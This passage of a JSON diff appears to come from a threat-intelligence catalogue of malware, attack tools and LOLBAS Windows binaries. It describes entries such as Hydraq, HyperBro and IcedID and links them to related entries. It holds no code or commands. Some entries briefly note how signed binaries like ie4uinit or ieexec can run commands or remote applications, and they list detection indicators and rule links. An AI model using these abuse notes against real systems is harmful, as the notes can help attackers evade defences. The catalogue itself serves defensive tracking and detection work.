"033ae561-8c4e-4b67-995b-b408c39a5c31", + "value": "HUC Packet Transmit Tool" + }, + { + "description": "[HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. [[Operation Quantum Entanglement](https://app.tidalcyber.com/references/c94f9652-32c3-4975-a9c0-48f93bdfe790)][[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0040", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "225314a7-8f40-48d4-9cff-3ec39b177762", + "type": "used-by" + }, + { + "dest-uuid": "d5e96a35-7b0b-4c6a-9533-d63ecbda563e", + "type": "similar" + }, + { + "dest-uuid": "033ae561-8c4e-4b67-995b-b408c39a5c31", + "type": "similar" + } + ], + "uuid": "b98d9fe7-9aa3-409a-bf5c-eadb01bac948", + "value": "HTRAN" + }, + { + "description": "", + "meta": { + "id": "1a0c9f6c-1d5e-4246-ab14-99c3f95069a9" + }, + "related": [ + { + "dest-uuid": "c4fe23f7-f18c-40f6-b431-0b104b497eaa", + "type": "similar" + } + ], + "uuid": "e0a43dd6-f2c2-4468-bbb8-7413097b6cf3", + "value": "Token Control" + }, + { + "description": "[[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]", + "meta": { + "id": "c5397b7f-9112-4253-ab17-1af3aa3d22db" + }, + "related": [ + { + "dest-uuid": "c4fe23f7-f18c-40f6-b431-0b104b497eaa", + "type": "similar" + } + ], + "uuid": "ae7376fa-b847-4417-bb29-f0316d507a30", + "value": "HttpDump" + }, + { + "description": "[HTTPBrowser](https://app.tidalcyber.com/software/c4fe23f7-f18c-40f6-b431-0b104b497eaa) is malware that has been used by several threat groups. [[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)] [[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)] It is believed to be of Chinese origin. [[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0070", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", + "type": "similar" + }, + { + "dest-uuid": "e0a43dd6-f2c2-4468-bbb8-7413097b6cf3", + "type": "similar" + }, + { + "dest-uuid": "ae7376fa-b847-4417-bb29-f0316d507a30", + "type": "similar" + } + ], + "uuid": "c4fe23f7-f18c-40f6-b431-0b104b497eaa", + "value": "HTTPBrowser" + }, + { + "description": "[httpclient](https://app.tidalcyber.com/software/bf19eba4-7ea1-4c24-95c6-6bcfb44f4c49) is malware used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. [[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0068", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6005f4a9-fe26-4237-a44e-3f6cbb1fe75c", + "type": "used-by" + }, + { + "dest-uuid": "e8268361-a599-4e45-bd3f-71c8c7e700c0", + "type": "similar" + } + ], + "uuid": "bf19eba4-7ea1-4c24-95c6-6bcfb44f4c49", + "value": "httpclient" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "1c724041-1424-4431-b35e-e731a886dfcb" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "6289f8d1-0b84-47ff-ba58-cfd3e14776d7", + "value": "Roarur" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "1c5cde21-0bdc-41db-8090-f4ad65fb5cef" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "dd780c01-a937-4658-83bd-46a65c054c94", + "value": "HomeUnix" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "19dfc9b6-80c7-4fdc-9899-efa6d85f45bb" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "af34fe17-6c8c-4acb-af9a-e5690b6badf2", + "value": "HydraQ" + }, + { + "description": "[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)][[Symantec Trojan.Hydraq Jan 2010](https://app.tidalcyber.com/references/10bed842-400f-4276-972d-5fca794ea778)]", + "meta": { + "id": "c3116a93-2c85-40b3-8c38-b6914bf8e52c" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "259df672-c6da-4aa9-9bdb-4bc2031ad5c4", + "value": "Aurora" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "b066e03b-37be-4d57-822a-9eed4d5e83ff" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "6c573ae8-c8be-47df-8f2c-37cf44682526", + "value": "MdmBot" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "2d063ba3-d6c7-4e2c-b224-1894b230a870" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "18a743ce-f743-41af-8769-af48e3e327b8", + "value": "Homux" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "95d5fcdf-cc1e-4ebe-bb3e-7e23083f8305" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "bfb0d570-1fd7-406c-bce3-f9185b1049cf", + "value": "HidraQ" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "dd0bc3f5-c55b-4be5-875d-a240b55a8775" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "909a0326-a18f-4c92-8f57-f3dc18df4cd5", + "value": "McRat" + }, + { + "description": "[[MicroFocus 9002 Aug 2016](https://app.tidalcyber.com/references/a4d6bdd1-e70c-491b-a569-72708095c809)]", + "meta": { + "id": "a68cc5bd-23a2-40a7-9576-c50d26702d81" + }, + "related": [ + { + "dest-uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "type": "similar" + } + ], + "uuid": "b5319b1f-bc11-4e2b-8018-f5cb021fbc4f", + "value": "9002 RAT" + }, + { + "description": "[Hydraq](https://app.tidalcyber.com/software/4ffbca79-358a-4ba5-bfbb-dc1694c45646) is a data-theft trojan first used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094).[[MicroFocus 9002 Aug 2016](https://app.tidalcyber.com/references/a4d6bdd1-e70c-491b-a569-72708095c809)][[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)][[Symantec Trojan.Hydraq Jan 2010](https://app.tidalcyber.com/references/10bed842-400f-4276-972d-5fca794ea778)][[ASERT Seven Pointed Dagger Aug 2015](https://app.tidalcyber.com/references/a8f323c7-82bc-46e6-bd6c-0b631abc644a)][[FireEye DeputyDog 9002 November 2013](https://app.tidalcyber.com/references/68b5a913-b696-4ca5-89ed-63453023d2a2)][[ProofPoint GoT 9002 Aug 2017](https://app.tidalcyber.com/references/b796f889-400c-440b-86b2-1588fd15f3ae)][[FireEye Sunshop Campaign May 2013](https://app.tidalcyber.com/references/ec246c7a-3396-46f9-acc4-a100cb5e5fe6)][[PaloAlto 3102 Sept 2015](https://app.tidalcyber.com/references/db340043-43a7-4b16-a570-92a0d879b2bf)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0203", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "used-by" + }, + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "used-by" + }, + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "73a4793a-ce55-4159-b2a6-208ef29b326f", + "type": "similar" + }, + { + "dest-uuid": "6289f8d1-0b84-47ff-ba58-cfd3e14776d7", + "type": "similar" + }, + { + "dest-uuid": "dd780c01-a937-4658-83bd-46a65c054c94", + "type": "similar" + }, + { + "dest-uuid": "af34fe17-6c8c-4acb-af9a-e5690b6badf2", + "type": "similar" + }, + { + "dest-uuid": "259df672-c6da-4aa9-9bdb-4bc2031ad5c4", + "type": "similar" + }, + { + "dest-uuid": "6c573ae8-c8be-47df-8f2c-37cf44682526", + "type": "similar" + }, + { + "dest-uuid": "18a743ce-f743-41af-8769-af48e3e327b8", + "type": "similar" + }, + { + "dest-uuid": "bfb0d570-1fd7-406c-bce3-f9185b1049cf", + "type": "similar" + }, + { + "dest-uuid": "909a0326-a18f-4c92-8f57-f3dc18df4cd5", + "type": "similar" + }, + { + "dest-uuid": "b5319b1f-bc11-4e2b-8018-f5cb021fbc4f", + "type": "similar" + } + ], + "uuid": "4ffbca79-358a-4ba5-bfbb-dc1694c45646", + "value": "Hydraq" + }, + { + "description": "[HyperBro](https://app.tidalcyber.com/software/57cec527-26fb-44a1-b1a9-506a3af2c9f2) is a custom in-memory backdoor used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5).[[Unit42 Emissary Panda May 2019](https://app.tidalcyber.com/references/3a3ec86c-88da-40ab-8e5f-a7d5102c026b)][[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0398", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "5e814485-012d-423d-b769-026bfed0f451", + "type": "similar" + } + ], + "uuid": "57cec527-26fb-44a1-b1a9-506a3af2c9f2", + "value": "HyperBro" + }, + { + "description": "[HyperStack](https://app.tidalcyber.com/software/ba3236e9-c86b-4b5d-89ed-7f71940a0588) is a RPC-based backdoor used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) since at least 2018. [HyperStack](https://app.tidalcyber.com/software/ba3236e9-c86b-4b5d-89ed-7f71940a0588) has similarities to other backdoors used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) including [Carbon](https://app.tidalcyber.com/software/61f5d19c-1da2-43d1-ab20-51eacbca71f2).[[Accenture HyperStack October 2020](https://app.tidalcyber.com/references/680f2a0b-f69d-48bd-93ed-20ee2f79e3f7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0537", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "2cf7dec3-66fc-423f-b2c7-58f1de243b4e", + "type": "similar" + } + ], + "uuid": "ba3236e9-c86b-4b5d-89ed-7f71940a0588", + "value": "HyperStack" + }, + { + "description": "[IceApple](https://app.tidalcyber.com/software/5a73defd-6a1a-4132-8427-cec649e8267a) is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.[[CrowdStrike IceApple May 2022](https://app.tidalcyber.com/references/325988b8-1c7d-4296-83d6-bfcbe533b75e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1022", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dd889a55-fb2c-4ec7-8e9f-c399939a49e1", + "type": "similar" + } + ], + "uuid": "5a73defd-6a1a-4132-8427-cec649e8267a", + "value": "IceApple" + }, + { + "description": "[IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433) has been downloaded by [Emotet](https://app.tidalcyber.com/software/c987d255-a351-4736-913f-91e2f28d0654) in multiple campaigns.[[IBM IcedID November 2017](https://app.tidalcyber.com/references/fdc56361-24f4-4fa5-949e-02e61c4d3be8)][[Juniper IcedID June 2020](https://app.tidalcyber.com/references/426886d0-cdf2-4af7-a0e4-366c1b0a1942)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0483", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "used-by" + }, + { + "dest-uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "type": "used-by" + }, + { + "dest-uuid": "5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "type": "similar" + } + ], + "uuid": "7f59bb7c-5fa9-497d-9d8e-ba9349fd9433", + "value": "IcedID" + }, + { + "description": "[[Ie4uinit.exe - LOLBAS Project](/references/01f9a368-5933-47a1-85a9-e5883a5ca266)]", + "meta": { + "id": "4dfd5be2-3e5d-4519-b431-df051c43fceb", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "332e37c0-63fe-4e99-85a9-94210d42c21d", + "type": "similar" + } + ], + "uuid": "a211a6fa-b203-46df-b2d2-244a92bd310c", + "value": "Ie4uinit.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Executes commands from a specially prepared ie4uinit.inf file.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\windows\\system32\\ie4uinit.exe\n* c:\\windows\\sysWOW64\\ie4uinit.exe\n* c:\\windows\\system32\\ieuinit.inf\n* c:\\windows\\sysWOW64\\ieuinit.inf\n\n**Resources:**\n* [https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/](https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/)\n\n**Detection:**\n* IOC: ie4uinit.exe copied outside of %windir%\n* IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%\n* Sigma: [proc_creation_win_lolbin_ie4uinit.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml)[[Ie4uinit.exe - LOLBAS Project](/references/01f9a368-5933-47a1-85a9-e5883a5ca266)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5116", + "source": "Tidal Cyber", + "tags": [ + "f32f1513-7277-4257-9c35-c8ab3da17c84", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a211a6fa-b203-46df-b2d2-244a92bd310c", + "type": "similar" + } + ], + "uuid": "332e37c0-63fe-4e99-85a9-94210d42c21d", + "value": "Ie4uinit" + }, + { + "description": "[[Ieadvpack.dll - LOLBAS Project](/references/79943a49-23d6-499b-a022-7c2f8bd68aee)]", + "meta": { + "id": "d97d63bc-8649-47f0-bc00-f53fd189ea75", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "e1aa3cbd-2337-47d6-b6b0-beb5d1bbfc1e", + "type": "similar" + } + ], + "uuid": "da3647b2-1431-4292-affb-9e24d647a6fe", + "value": "Ieadvpack.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\ieadvpack.dll\n* c:\\windows\\syswow64\\ieadvpack.dll\n\n**Resources:**\n* [https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/](https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/)\n* [https://twitter.com/pabraeken/status/991695411902599168](https://twitter.com/pabraeken/status/991695411902599168)\n* [https://twitter.com/0rbz_/status/974472392012689408](https://twitter.com/0rbz_/status/974472392012689408)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [detect_rundll32_application_control_bypass___advpack.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml)[[Ieadvpack.dll - LOLBAS Project](/references/79943a49-23d6-499b-a022-7c2f8bd68aee)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5190", + "source": "Tidal Cyber", + "tags": [ + "e794994d-c38a-44d9-9253-53191ca9e56b", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "da3647b2-1431-4292-affb-9e24d647a6fe", + "type": "similar" + } + ], + "uuid": "e1aa3cbd-2337-47d6-b6b0-beb5d1bbfc1e", + "value": "Ieadvpack" + }, + { + "description": "[[iediagcmd.exe - LOLBAS Project](/references/de238a18-2275-497e-adcf-453a016a24c4)]", + "meta": { + "id": "ad6c5eef-c940-4c56-ad58-39336d0fcf3e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1feba268-9fff-495f-94e9-5b46336bff3b", + "type": "similar" + } + ], + "uuid": "8d176fe1-a0f6-48a6-a0d8-ac71faddcc0c", + "value": "iediagcmd.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Diagnostics Utility for Internet Explorer\n\n**Author:** manasmbellani\n\n**Paths:**\n* C:\\Program Files\\Internet Explorer\\iediagcmd.exe\n\n**Resources:**\n* [https://twitter.com/Hexacorn/status/1507516393859731456](https://twitter.com/Hexacorn/status/1507516393859731456)\n\n**Detection:**\n* Sigma: [https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml](https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml)\n* IOC: Sysmon Event ID 1\n* IOC: Execution of process iediagcmd.exe with /out could be suspicious[[iediagcmd.exe - LOLBAS Project](/references/de238a18-2275-497e-adcf-453a016a24c4)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5117", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "8d176fe1-a0f6-48a6-a0d8-ac71faddcc0c", + "type": "similar" + } + ], + "uuid": "1feba268-9fff-495f-94e9-5b46336bff3b", + "value": "iediagcmd" + }, + { + "description": "[[Ieexec.exe - LOLBAS Project](/references/91f31525-585d-4b71-83d7-9b7c2feacd34)]", + "meta": { + "id": "4450e721-4fe6-4e03-88db-d8793ba3df42", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "e7ede205-4d50-42c3-92d0-4988aca5c4a1", + "type": "similar" + } + ], + "uuid": "77a7429e-b1bb-4172-9fc5-3a37a4cedddc", + "value": "Ieexec.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe\n\n**Resources:**\n* [https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/](https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_ieexec_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* IOC: Network connections originating from ieexec.exe may be suspicious[[Ieexec.exe - LOLBAS Project](/references/91f31525-585d-4b71-83d7-9b7c2feacd34)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5118", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "77a7429e-b1bb-4172-9fc5-3a37a4cedddc", + "type": "similar" + } + ], + "uuid": "e7ede205-4d50-42c3-92d0-4988aca5c4a1", + "value": "Ieexec" + }, + { + "description": "[[Ieframe.dll - LOLBAS Project](/references/aab9c80d-1f1e-47ba-954d-65e7400054df)]", + "meta": { + "id": "a21f5def-f93d-4692-b575-5af953594e52", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "57072f02-06c1-4267-b665-fbbf72b96bb4", + "type": "similar" + } + ], + "uuid": "567ab907-8765-400b-8dd5-61182ddd8db6", + "value": "Ieframe.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Internet Browser DLL for translating HTML code.\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\ieframe.dll\n* c:\\windows\\syswow64\\ieframe.dll\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/](http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/)\n* [https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/](https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/)\n* [https://twitter.com/bohops/status/997690405092290561](https://twitter.com/bohops/status/997690405092290561)\n* [https://windows10dll.nirsoft.net/ieframe_dll.html](https://windows10dll.nirsoft.net/ieframe_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Ieframe.dll - LOLBAS Project](/references/aab9c80d-1f1e-47ba-954d-65e7400054df)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5191", + "source": "Tidal Cyber", + "tags": [ + "fc23fb85-8c48-4f0b-aeb6-b78fd6e25e0a", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "567ab907-8765-400b-8dd5-61182ddd8db6", + "type": "similar" + } + ], + "uuid": "57072f02-06c1-4267-b665-fbbf72b96bb4", + "value": "Ieframe" + }, + { + "description": "[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. [[Wikipedia Ifconfig](https://app.tidalcyber.com/references/7bb238d4-4571-4cd0-aab2-76797570724a)]", + "meta": { + "platforms": [], + "software_attack_id": "S0101", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "362dc67f-4e85-4562-9dac-1b6b7f3ec4b5", + "type": "similar" + } + ], + "uuid": "93ab16d1-625e-4b1c-bb28-28974c269c47", + "value": "ifconfig" + }, + { + "description": "[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)].", + "meta": { + "id": "480e45eb-deb2-4844-8eab-10649d33a5d2" + }, + "related": [ + { + "dest-uuid": "71098f6e-a2c0-434f-b991-6c079fd3e82d", + "type": "similar" + } + ], + "uuid": "1ffb9eb7-4c5b-4d88-93a5-79f250715502", + "value": "OSX/MacDownloader" + }, + { + "description": "[iKitten](https://app.tidalcyber.com/software/71098f6e-a2c0-434f-b991-6c079fd3e82d) is a macOS exfiltration agent [[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)].", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0278", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "2cfe8a26-5be7-4a09-8915-ea3d9e787513", + "type": "similar" + }, + { + "dest-uuid": "1ffb9eb7-4c5b-4d88-93a5-79f250715502", + "type": "similar" + } + ], + "uuid": "71098f6e-a2c0-434f-b991-6c079fd3e82d", + "value": "iKitten" + }, + { + "description": "[[Ilasm.exe - LOLBAS Project](/references/347a1f01-02ce-488e-9100-862971c1833f)]", + "meta": { + "id": "ecc55905-6b8d-41a5-af76-a9cb6d65ccfc", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "492104c0-79d6-461e-9dc5-0e4bfd3f2387", + "type": "similar" + } + ], + "uuid": 